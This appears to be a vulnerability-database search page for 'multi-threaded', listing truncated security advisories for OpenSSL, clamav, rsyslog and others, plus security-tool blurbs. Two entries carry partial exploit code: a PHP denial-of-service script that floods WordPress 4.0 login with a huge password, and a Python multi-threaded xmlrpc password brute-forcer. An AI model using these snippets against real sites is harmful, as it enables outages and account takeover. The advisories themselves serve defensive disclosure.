550 matches found
USN-2639-1: OpenSSL vulnerabilities
Praveen Kariyanahalli, Ivan Fratric and Felix Groebert discovered that OpenSSL incorrectly handled memory when buffering DTLS data. A remote attacker could use this issue to cause OpenSSL to crash, resulting in a denial of service, or possibly execute arbitrary code. CVE-2014-8176 Joseph...
Proxenet - Hacker Friendly Proxy for Web Application Penetration Tests
Proxenet is a hacker friendly proxy for web application penetration tests. proxenet is a multi-threaded proxy which allows you manipulate your HTTP requests and responses using your favorite scripting language. No need to learn Java like for Burp or Python like for mitmproxy. proxenet supports...
Vulnerability in OpenSSL - Race condition handling NewSessionTicket
If a NewSessionTicket is received by a multi-threaded client when attempting to reuse a previous ticket then a race condition can occur potentially leading to a double free of the ticket data. Found by Emilia Käsper OpenSSL...
UBUNTU-CVE-2015-1791
Race condition in the ssl3getnewsessionticket function in ssl/s3clnt.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b, when used for a multi-threaded client, allows remote attackers to cause a denial of service double free and application crash or...
SUSE SLED12 / SLES12 Security Update : pigz (SUSE-SU-2015:0670-1)
Pigz, a multi-threaded implementation of gzip, was updated to fix one vulnerability. The following vulnerability was fixed : - A crafted file could have caused an unwanted directory traversal on extract CVE-2015-1191 Note that Tenable Network Security has extracted the preceding description block...
[SECURITY] Fedora 22 Update: clamav-0.98.7-1.fc22
Clam AntiVirus is an anti-virus toolkit for UNIX. The main purpose of this software is the integration with mail servers attachment scanning. The package provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool for automatic updating via Internet. The programs ar...
[SECURITY] Fedora 21 Update: clamav-0.98.7-1.fc21
Clam AntiVirus is an anti-virus toolkit for UNIX. The main purpose of this software is the integration with mail servers attachment scanning. The package provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool for automatic updating via Internet. The programs ar...
The vulnerability the batch using the scan framework-vulnerability warning-the black bar safety net
0x00 Preface Each vulnerability after the outbreak, many people are in a hurry to find a batch, thinking to brush a few holes in the submission of the clouds. In fact, some of the vulnerabilities of the detection step time can be unified extraction do into the framework. Today I'll share to make...
The local file contains(LFI)vulnerability Detection Tool – Kadimus-vulnerability warning-the black bar safety net
Kadimus is for detecting a site local file inclusion(LFI)vulnerability of security tools. Characteristics Detect all URL parameters /var/log/auth. log RCE /proc/self/environ RCE php://input RCE data://text RCE The source code leak detection Multi-thread scanning HTTP command execution vulnerabili...
[SECURITY] Fedora 20 Update: clamav-0.98.6-1.fc20
Clam AntiVirus is an anti-virus toolkit for UNIX. The main purpose of this software is the integration with mail servers attachment scanning. The package provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool for automatic updating via Internet. The programs ar...
AutoScan-Network - Automatically scan your network
AutoScan-Network is a network scanner discovering and managing application. No configuration is required to scan your network. The main goal is to print the list of connected equipments in your network. System Requirements : •Mac OS X 10.5 or later •Microsoft Windows XP, Vista •GNU/Linux •Maemo 4...
WordPress 4.0 Denial Of Service
$argv2, 'pwd' = strrepeat"A",1000000, 'redirectto' = $argv1 . "/wp-admin/", 'reauth' = 1, 'testcookie' = '1', 'wp-submit' = "Log%20In"; $cookieFiles = "cookie.txt"; curlsetoptarray$ch, array CURLOPTHEADER = 1, CURLOPTUSERAGENT = "Mozilla/5.0 Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6...
[SECURITY] Fedora 20 Update: clamav-0.98.5-1.fc20
Clam AntiVirus is an anti-virus toolkit for UNIX. The main purpose of this software is the integration with mail servers attachment scanning. The package provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool for automatic updating via Internet. The programs ar...
RedHat Update for rsyslog5 and rsyslog RHSA-2014:1671-01
The remote host is missing an update for the SPDX-FileCopyrightText: 2014 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
[SECURITY] Fedora 20 Update: rsyslog-7.4.8-2.fc20
Rsyslog is an enhanced, multi-threaded syslog daemon. It supports MySQL, syslog/TCP, RFC 3195, permitted sender lists, filtering on any message part, and fine grain output format control. It is compatible with stock sysklogd and can be used as a drop-in replacement. Rsyslog is simple to set up,...
[SECURITY] Fedora 21 Update: rsyslog-7.4.10-5.fc21
Rsyslog is an enhanced, multi-threaded syslog daemon. It supports MySQL, syslog/TCP, RFC 3195, permitted sender lists, filtering on any message part, and fine grain output format control. It is compatible with stock sysklogd and can be used as a drop-in replacement. Rsyslog is simple to set up,...
RedHat Update for rsyslog RHSA-2014:1397-01
The remote host is missing an update for the SPDX-FileCopyrightText: 2014 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
[SECURITY] Fedora 19 Update: mariadb-5.5.39-1.fc19
MariaDB is a community developed branch of MySQL. MariaDB is a multi-user, multi-threaded SQL database server. It is a client/server implementation consisting of a server daemon mysqld and many different client programs and libraries. The base package contains the standard MariaDB/MySQL client...
openssl: race condition in ssl_parse_serverhello_tlsext
A race condition was found in the way OpenSSL handled ServerHello messages with an included Supported EC Point Format extension. A malicious server could possibly use this flaw to cause a multi-threaded TLS/SSL client using OpenSSL to write into freed memory, causing the client to crash or execut...
WordPress xmlrpc using the test tool multi-threaded version-bug warning-the black bar safety net
The following is the code import futures import requests from Queue import Queue XMLURL = "http://www.myhack58.com/" USERFILE = "username.txt" PASSFILE = "password.txt" THREADNUM = 2 0 data = """wp. getUsersBlogs%s%s""" task = Queuedef attack: while not task. empty: username = the task. get passt...